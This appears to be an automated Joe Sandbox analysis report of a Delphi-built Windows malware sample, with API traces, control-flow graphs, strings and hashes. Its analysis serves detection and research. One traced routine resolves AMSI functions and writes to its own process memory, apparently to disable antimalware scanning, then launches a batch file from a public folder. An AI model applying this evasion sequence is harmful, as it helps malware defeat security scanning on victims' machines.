                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000000,04227598), ref: 04227441
                                                                                                                                  • GlobalAddAtomA.KERNEL32(00000000), ref: 04227474
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0422748F
                                                                                                                                  • GlobalAddAtomA.KERNEL32(00000000), ref: 042274C5
                                                                                                                                  • RegisterWindowMessageA.USER32(00000000,00000000,?,?,00000000,04227598), ref: 042274DB
                                                                                                                                    • Part of subcall function 041F7B44: InitializeCriticalSection.KERNEL32(List,?,?,042274F1,00000000,00000000,?,?,00000000,04227598), ref: 041F7B63
                                                                                                                                    • Part of subcall function 04227028: SetErrorMode.KERNEL32(00008000), ref: 04227041
                                                                                                                                    • Part of subcall function 04227028: GetModuleHandleA.KERNEL32(USER32,00000000,0422718E,?,00008000), ref: 04227065
                                                                                                                                    • Part of subcall function 04227028: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 04227072
                                                                                                                                    • Part of subcall function 04227028: LoadLibraryA.KERNEL32(imm32.dll,00000000,0422718E,?,00008000), ref: 0422708E
                                                                                                                                    • Part of subcall function 04227028: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 042270B0
                                                                                                                                    • Part of subcall function 04227028: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 042270C5
                                                                                                                                    • Part of subcall function 04227028: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 042270DA
                                                                                                                                    • Part of subcall function 04227028: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 042270EF
                                                                                                                                    • Part of subcall function 04227028: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 04227104
                                                                                                                                    • Part of subcall function 04227028: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 04227119
                                                                                                                                    • Part of subcall function 04227028: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0422712E
                                                                                                                                    • Part of subcall function 04227028: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 04227143
                                                                                                                                    • Part of subcall function 04227028: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 04227158
                                                                                                                                    • Part of subcall function 04227028: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 0422716D
                                                                                                                                    • Part of subcall function 04227028: SetErrorMode.KERNEL32(?,04227195,00008000), ref: 04227188
                                                                                                                                    • Part of subcall function 04231538: GetKeyboardLayout.USER32(00000000), ref: 0423157D
                                                                                                                                    • Part of subcall function 04231538: GetDC.USER32(00000000), ref: 042315D2
                                                                                                                                    • Part of subcall function 04231538: GetDeviceCaps.GDI32(00000000,0000005A), ref: 042315DC
                                                                                                                                    • Part of subcall function 04231538: ReleaseDC.USER32(00000000,00000000), ref: 042315E7
                                                                                                                                    • Part of subcall function 04232740: LoadIconA.USER32(00000000,MAINICON), ref: 04232837
                                                                                                                                    • Part of subcall function 04232740: GetModuleFileNameA.KERNEL32(00000000,?,00000100,?,?,?,04227530,00000000,00000000,?,?,00000000,04227598), ref: 04232869
                                                                                                                                    • Part of subcall function 04232740: OemToCharA.USER32(?,?), ref: 0423287C
                                                                                                                                    • Part of subcall function 04232740: CharNextA.USER32(?,00000000,?,00000100,?,?,?,04227530,00000000,00000000,?,?,00000000,04227598), ref: 042328BB
                                                                                                                                    • Part of subcall function 04232740: CharLowerA.USER32(00000000,?,00000000,?,00000100,?,?,?,04227530,00000000,00000000,?,?,00000000,04227598), ref: 042328C1
                                                                                                                                  • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,04227598), ref: 0422755F
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 04227570
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$CharModule$AtomCurrentErrorGlobalHandleLoadMode$CapsCriticalDeviceFileIconInitializeKeyboardLayoutLibraryLowerMessageNameNextProcessRegisterReleaseSectionThreadWindow
                                                                                                                                  • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
                                                                                                                                  • API String ID: 1515865724-1126952177
                                                                                                                                  • Opcode ID: a6c81a6295389ba272fbc3337103c80758d4b1bf12f6109c91052fccda748443
                                                                                                                                  • Instruction ID: 8eab940e80ad6907fca7ac60ba8aee5762021cab39f50f6d567a97d0562fc3c2
                                                                                                                                  • Opcode Fuzzy Hash: a6c81a6295389ba272fbc3337103c80758d4b1bf12f6109c91052fccda748443
                                                                                                                                  • Instruction Fuzzy Hash: 88416AB8B146059FEB00FFA9E9C49AEB7F9EB59318B404565E404E7310DB39BD018F54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 7257 423bcf8-423bcfc 7258 423bd01-423bd06 7257->7258 7258->7258 7259 423bd08-423c1bb call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e49ec * 2 call 41e4b0c call 41e4a24 call 41e320c call 41e4980 * 2 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e49ec call 41e8eb0 call 41e4c4c call 41e507c call 41e50f8 call 41e49ec call 41e4c4c call 41e507c call 41e50f8 CreateProcessAsUserW call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 7258->7259 7420 423c1c1-423c2c1 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 WaitForSingleObject CloseHandle * 2 7259->7420 7421 423c2c6-423c313 call 41e47ac call 41e4f68 call 41e47ac call 41e4f68 call 41e47ac 7259->7421 7420->7421
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 041FFD38: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,041FFE14), ref: 041FFD70
                                                                                                                                    • Part of subcall function 041FFD38: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFD7E
                                                                                                                                    • Part of subcall function 041FFD38: GetProcAddress.KERNEL32(74B80000,00000000), ref: 041FFD97
                                                                                                                                    • Part of subcall function 041FFD38: GetCurrentProcess.KERNEL32(0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFDB3
                                                                                                                                    • Part of subcall function 041FFD38: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFDB9
                                                                                                                                    • Part of subcall function 041FFD38: GetCurrentProcess.KERNEL32(0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 041FFDE3
                                                                                                                                    • Part of subcall function 041FFD38: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000), ref: 041FFDE9
                                                                                                                                    • Part of subcall function 041FFD38: FreeLibrary.KERNEL32(74B80000,00000000,0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000), ref: 041FFDF4
                                                                                                                                  • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,0436EBB8,0436EBFC,ScanString,0427A350,0423C330,OpenSession,0427A350), ref: 0423C05F
                                                                                                                                  • WaitForSingleObject.KERNEL32(0000089C,000000FF,ScanString,0427A350,0423C330,OpenSession,0427A350,0423C330,ScanString,0427A350,0423C330,OpenSession,0427A350,0423C330,UacScan,0427A350), ref: 0423C2AB
                                                                                                                                  • CloseHandle.KERNEL32(0000089C,0000089C,000000FF,ScanString,0427A350,0423C330,OpenSession,0427A350,0423C330,ScanString,0427A350,0423C330,OpenSession,0427A350,0423C330,UacScan), ref: 0423C2B6
                                                                                                                                  • CloseHandle.KERNEL32(000008A0,0000089C,0000089C,000000FF,ScanString,0427A350,0423C330,OpenSession,0427A350,0423C330,ScanString,0427A350,0423C330,OpenSession,0427A350,0423C330), ref: 0423C2C1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleProcess$CloseCurrentLibraryMemoryVirtual$AddressCreateFreeLoadModuleObjectProcProtectSingleUserWaitWrite
                                                                                                                                  • String ID: *"C:\Users\Public\Libraries\FinqiaevO.bat" $Amsi$AmsiOpenSession$OpenSession$ScanString$UacScan
                                                                                                                                  • API String ID: 2776809114-751107746
                                                                                                                                  • Opcode ID: 220addad9f38dbf6624793eb5a80ce2db1afbd8a98e5884ac2355115ab70c5f5
                                                                                                                                  • Instruction ID: e065ea1186976fb998fff41c69340d873b356fa15a08546d663b56aea27b53be
                                                                                                                                  • Opcode Fuzzy Hash: 220addad9f38dbf6624793eb5a80ce2db1afbd8a98e5884ac2355115ab70c5f5
                                                                                                                                  • Instruction Fuzzy Hash: 6BF10E39B10519DBEB10EBA6DCC1BEEB3B9AF88209F108161E144BB254DB30FD468F55
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 7476 4232740-423274d 7477 4232757-423276f call 41fd8bc 7476->7477 7478 423274f-4232752 call 41e3bdc 7476->7478 7482 4232771-4232779 7477->7482 7483 423277f-4232789 7477->7483 7478->7477 7482->7483 7484 423278b-4232793 7483->7484 7485 4232799-4232890 call 41e38a0 * 3 call 4207150 LoadIconA call 4207524 GetModuleFileNameA OemToCharA call 41ece38 7483->7485 7484->7485 7498 4232892-423289b call 41e9024 7485->7498 7499 42328a0-42328af call 41ece6c 7485->7499 7498->7499 7503 42328b1 7499->7503 7504 42328b4-42328e9 CharNextA CharLowerA call 41e49f8 call 41fea38 7499->7504 7503->7504 7508 42328ee-42328fc 7504->7508 7509 4232905-4232934 call 4234b14 call 4235674 7508->7509 7510 42328fe-4232900 call 4232a94 7508->7510 7516 4232936-4232942 call 41e3c34 7509->7516 7517 4232945-423294c 7509->7517 7510->7509 7516->7517
                                                                                                                                  APIs
                                                                                                                                  • LoadIconA.USER32(00000000,MAINICON), ref: 04232837
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000100,?,?,?,04227530,00000000,00000000,?,?,00000000,04227598), ref: 04232869
                                                                                                                                  • OemToCharA.USER32(?,?), ref: 0423287C
                                                                                                                                  • CharNextA.USER32(?,00000000,?,00000100,?,?,?,04227530,00000000,00000000,?,?,00000000,04227598), ref: 042328BB
                                                                                                                                  • CharLowerA.USER32(00000000,?,00000000,?,00000100,?,?,?,04227530,00000000,00000000,?,?,00000000,04227598), ref: 042328C1
                                                                                                                                    • Part of subcall function 04232A94: GetClassInfoA.USER32(041E0000,04232730,?), ref: 04232AF3
                                                                                                                                    • Part of subcall function 04232A94: RegisterClassA.USER32(0424B650), ref: 04232B0B
                                                                                                                                    • Part of subcall function 04232A94: SetWindowLongA.USER32(0000000E,000000FC,10940000), ref: 04232BA7
                                                                                                                                    • Part of subcall function 04232A94: SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 04232BC9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Char$Class$FileIconInfoLoadLongLowerMessageModuleNameNextRegisterSendWindow
                                                                                                                                  • String ID: MAINICON
                                                                                                                                  • API String ID: 2763768735-2283262055
                                                                                                                                  • Opcode ID: 7cffb1620daed879af13ccd02f525646651f349079f3b7e7cbcc828f78c80f37
                                                                                                                                  • Instruction ID: 6328953d6ee2b87de417ee1946bfb3627b8c8a9a6cacdf854411ff5baf44a20a
                                                                                                                                  • Opcode Fuzzy Hash: 7cffb1620daed879af13ccd02f525646651f349079f3b7e7cbcc828f78c80f37
                                                                                                                                  • Instruction Fuzzy Hash: A2516BB0B042459FEB40EF29D8C4B957BE4AB15308F4840F4DC48CF346DBBAA9898B61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 7526 41e17c0-41e17d2 7527 41e17d8-41e17e8 7526->7527 7528 41e1a04-41e1a09 7526->7528 7531 41e17ea-41e17f7 7527->7531 7532 41e1840-41e1849 7527->7532 7529 41e1a0f-41e1a20 7528->7529 7530 41e1b1c-41e1b1f 7528->7530 7533 41e19d4-41e19e1 7529->7533 7534 41e1a22-41e1a3e 7529->7534 7536 41e1b25-41e1b27 7530->7536 7537 41e1720-41e1749 VirtualAlloc 7530->7537 7538 41e17f9-41e1806 7531->7538 7539 41e1810-41e181c 7531->7539 7532->7531 7535 41e184b-41e1857 7532->7535 7533->7534 7545 41e19e3-41e19f7 Sleep 7533->7545 7540 41e1a4c-41e1a5b 7534->7540 7541 41e1a40-41e1a48 7534->7541 7535->7531 7542 41e1859-41e1865 7535->7542 7543 41e177b-41e1781 7537->7543 7544 41e174b-41e1778 call 41e16e0 7537->7544 7546 41e1808-41e180c 7538->7546 7547 41e1830-41e183d 7538->7547 7548 41e181e-41e182c 7539->7548 7549 41e188c-41e1895 7539->7549 7551 41e1a5d-41e1a71 7540->7551 7552 41e1a74-41e1a7c 7540->7552 7550 41e1aa8-41e1abe 7541->7550 7542->7531 7553 41e1867-41e187a Sleep 7542->7553 7544->7543 7545->7534 7557 41e19f9-41e1a00 Sleep 7545->7557 7555 41e18c8-41e18d2 7549->7555 7556 41e1897-41e18a4 7549->7556 7563 41e1ad7-41e1ae3 7550->7563 7564 41e1ac0-41e1ace 7550->7564 7551->7550 7559 41e1a7e-41e1a96 7552->7559 7560 41e1a98-41e1a9a call 41e1668 7552->7560 7553->7531 7558 41e1880-41e1887 Sleep 7553->7558 7565 41e1944-41e1950 7555->7565 7566 41e18d4-41e18ff 7555->7566 7556->7555 7562 41e18a6-41e18ba Sleep 7556->7562 7557->7533 7558->7532 7569 41e1a9f-41e1aa7 7559->7569 7560->7569 7562->7555 7571 41e18bc-41e18c3 Sleep 7562->7571 7575 41e1b04 7563->7575 7576 41e1ae5-41e1af8 7563->7576 7564->7563 7572 41e1ad0 7564->7572 7567 41e1978-41e1987 call 41e1668 7565->7567 7568 41e1952-41e1964 7565->7568 7573 41e1918-41e1926 7566->7573 7574 41e1901-41e190f 7566->7574 7587 41e1999-41e19d2 7567->7587 7591 41e1989-41e1993 7567->7591 7578 41e1968-41e1976 7568->7578 7579 41e1966 7568->7579 7571->7556 7572->7563 7582 41e1928-41e1942 call 41e159c 7573->7582 7583 41e1994 7573->7583 7574->7573 7581 41e1911 7574->7581 7577 41e1b09-41e1b1b 7575->7577 7576->7577 7584 41e1afa-41e1aff call 41e159c 7576->7584 7578->7587 7579->7578 7581->7573 7582->7587 7583->7587 7584->7577
                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNEL32(00000000,?,041E209C), ref: 041E186C
                                                                                                                                  • Sleep.KERNEL32(0000000A,00000000,?,041E209C), ref: 041E1882
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Sleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                  • Opcode ID: 31058e86cbe1e9d6efe31e6f4cea579929d7e154ea049e8207fbd60db665d6bd
                                                                                                                                  • Instruction ID: c725b123b862e9a305d31651298bac6341e95190e81a0e6d5fb846fbe79e0a8e
                                                                                                                                  • Opcode Fuzzy Hash: 31058e86cbe1e9d6efe31e6f4cea579929d7e154ea049e8207fbd60db665d6bd
                                                                                                                                  • Instruction Fuzzy Hash: 21B1017A600A11ABD715CF2EE8C4376BBE1EBC5321F1982EED4598B384D774B881C791
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 7595 41e1b28-41e1b37 7596 41e1b3d-41e1b41 7595->7596 7597 41e1c08-41e1c0b 7595->7597 7600 41e1ba4-41e1bad 7596->7600 7601 41e1b43-41e1b4a 7596->7601 7598 41e1cf8-41e1cfc 7597->7598 7599 41e1c11-41e1c1b 7597->7599 7607 41e1784-41e17a7 call 41e16e0 VirtualFree 7598->7607 7608 41e1d02-41e1d07 7598->7608 7603 41e1c1d-41e1c29 7599->7603 7604 41e1bd8-41e1be5 7599->7604 7600->7601 7602 41e1baf-41e1bc3 Sleep 7600->7602 7605 41e1b4c-41e1b57 7601->7605 7606 41e1b78-41e1b7a 7601->7606 7602->7601 7609 41e1bc9-41e1bd4 Sleep 7602->7609 7612 41e1c2b-41e1c2e 7603->7612 7613 41e1c60-41e1c6e 7603->7613 7604->7603 7611 41e1be7-41e1bfb Sleep 7604->7611 7614 41e1b59-41e1b5e 7605->7614 7615 41e1b60-41e1b75 7605->7615 7616 41e1b8f 7606->7616 7617 41e1b7c-41e1b8d 7606->7617 7624 41e17a9-41e17b0 7607->7624 7625 41e17b2 7607->7625 7609->7600 7611->7603 7622 41e1bfd-41e1c04 Sleep 7611->7622 7619 41e1c32-41e1c36 7612->7619 7613->7619 7620 41e1c70-41e1c75 call 41e155c 7613->7620 7618 41e1b92-41e1b9f 7616->7618 7617->7616 7617->7618 7618->7599 7626 41e1c78-41e1c85 7619->7626 7627 41e1c38-41e1c3e 7619->7627 7620->7619 7622->7604 7630 41e17b5-41e17bf 7624->7630 7625->7630 7626->7627 7629 41e1c87-41e1c8e call 41e155c 7626->7629 7631 41e1c90-41e1c9a 7627->7631 7632 41e1c40-41e1c5e call 41e159c 7627->7632 7629->7627 7634 41e1c9c-41e1cc4 VirtualFree 7631->7634 7635 41e1cc8-41e1cf5 call 41e15fc 7631->7635
                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,00000000,041E2080), ref: 041E1BB3
                                                                                                                                  • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,041E2080), ref: 041E1BCD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Sleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                  • Opcode ID: 79a1ba83119dd0593e15940a85c5e55a397a0f215c9eab3a050dc47dde51e8a2
                                                                                                                                  • Instruction ID: 7addbbafd202c1e8cb49fec1479fbe0405a50ed0a156c18001061b52fbbc4622
                                                                                                                                  • Opcode Fuzzy Hash: 79a1ba83119dd0593e15940a85c5e55a397a0f215c9eab3a050dc47dde51e8a2
                                                                                                                                  • Instruction Fuzzy Hash: A451B079700B00AEE7158F6AD9C4776BBE0EF85324F1885EED444CB281E774E984CB91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 7705 420765c-4207696 MulDiv 7706 4207698-420769f call 4207618 7705->7706 7707 42076ae-42076e7 call 4200204 call 42002a4 call 4200308 7705->7707 7706->7707 7713 42076a1-42076a9 call 41e4820 7706->7713 7718 4207701-4207716 call 41e38d0 7707->7718 7719 42076e9-42076f4 call 4200538 7707->7719 7713->7707 7722 42076f9-42076fc call 4200274 7719->7722 7722->7718
                                                                                                                                  APIs
                                                                                                                                  • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 04207682
                                                                                                                                    • Part of subcall function 04207618: GetDC.USER32(00000000), ref: 04207621
                                                                                                                                    • Part of subcall function 04207618: SelectObject.GDI32(00000000,058A00B4), ref: 04207633
                                                                                                                                    • Part of subcall function 04207618: GetTextMetricsA.GDI32(00000000), ref: 0420763E
                                                                                                                                    • Part of subcall function 04207618: ReleaseDC.USER32(00000000,00000000), ref: 0420764F
                                                                                                                                  Strings
                                                                                                                                  • SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes, xrefs: 042076D8
                                                                                                                                  • Tahoma, xrefs: 042076A4
                                                                                                                                  • MS Shell Dlg 2, xrefs: 042076EC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MetricsObjectReleaseSelectText
                                                                                                                                  • String ID: MS Shell Dlg 2$SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$Tahoma
                                                                                                                                  • API String ID: 2013942131-1011973972
                                                                                                                                  • Opcode ID: ad444ebb7d3d742396050677d3a216aff4d2fec93202958897f0323ba5896964
                                                                                                                                  • Instruction ID: 74813a3316e1d981212a6d6a4ec6e394261f4843ef3c6a83b63f55e081fd60bf
                                                                                                                                  • Opcode Fuzzy Hash: ad444ebb7d3d742396050677d3a216aff4d2fec93202958897f0323ba5896964
                                                                                                                                  • Instruction Fuzzy Hash: 8F11E330760608AFFB01EF68E881A6D7BE5EB86604F90C4A4E400976E2CB35BD01CB10
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetClassInfoA.USER32(041E0000,041FEA28,?), ref: 041FEA59
                                                                                                                                  • UnregisterClassA.USER32(041FEA28,041E0000), ref: 041FEA82
                                                                                                                                  • RegisterClassA.USER32(0424AAF8), ref: 041FEA8C
                                                                                                                                  • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 041FEAD7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4025006896-0
                                                                                                                                  • Opcode ID: 5ce742ff15e4022ce8b46e612d2f0652973a22097a518db903e6d7256f3fd09f
                                                                                                                                  • Instruction ID: ef43239d963cfb39403d0f54cbaa327da2ed2b345cd5d24723daeade368df037
                                                                                                                                  • Opcode Fuzzy Hash: 5ce742ff15e4022ce8b46e612d2f0652973a22097a518db903e6d7256f3fd09f
                                                                                                                                  • Instruction Fuzzy Hash: AD015BB97402016BFB11EB9CECC4FAA37A9F759308F104150BA15F72D1D735AD828760
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,042004A2), ref: 04200374
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019,?,00000000,042004A2), ref: 042003DF
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019), ref: 04200444
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Open
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                  • Opcode ID: 163dec2600431a030be702771b8272ad05ba025b4c35e06113b1fcdc30f4644b
                                                                                                                                  • Instruction ID: e7c988fb72a53f3c39028004ecbd3bff3069394f368b0ba60fece881412ce95c
